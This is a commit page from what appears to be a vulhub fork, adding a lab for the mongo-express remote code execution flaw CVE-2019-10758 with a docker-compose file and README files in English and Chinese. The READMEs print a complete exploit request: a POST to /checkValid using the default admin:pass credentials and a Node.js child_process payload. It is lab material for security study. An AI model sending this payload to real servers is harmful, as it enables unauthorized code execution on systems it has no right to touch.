aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
mongo-express/CVE-2019-10758/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 9.2 KiB

38
mongo-express/CVE-2019-10758/README.md Normal file
View File

@@ -0,0 +1,38 @@
# Mongo Express Remote Code Execution (CVE-2019-10758)
[中文版本(Chinese version)](README.zh-cn.md)
mongo-express is a third-party Web interface for MongoDB, developed using Node.js and Express. If an attacker can successfully log in, or if the target server hasn't changed the default credentials (`admin:pass`), they can execute arbitrary Node.js code.
## Environment Setup
Execute the following command to start mongo-express version 0.53.0:
```bash
docker compose up -d
```
After the environment starts, visit `http://your-ip:8081` to access the Web interface.
## Vulnerability Reproduction
Send the following HTTP request to execute the code `this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")`:
```
POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
```
As you can see, the `touch /tmp/success` command has been executed successfully:
![](1.png)

34
mongo-express/CVE-2019-10758/README.zh-cn.md Normal file
View File

@@ -0,0 +1,34 @@
# Mongo Express 远程代码执行漏洞CVE-2019-10758
mongo-express是一款mongodb的第三方Web界面使用node和express开发。如果攻击者可以成功登录或者目标服务器没有修改默认的账号密码`admin:pass`则可以执行任意node.js代码。
## 漏洞环境
执行如下命令启动一个0.53.0版本的mongo-express
```bash
docker compose up -d
```
环境启动后,访问`http://your-ip:8081`即可查看到Web页面。
## 漏洞复现
直接发送如下数据包,即可执行代码`this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")`
```
POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
```
![](1.png)

9
mongo-express/CVE-2019-10758/docker-compose.yml Normal file
View File

@@ -0,0 +1,9 @@
services:
web:
image: vulhub/mongo-express:0.53.0
depends_on:
- mongo
ports:
- "8081:8081"
mongo:
image: mongo:3.4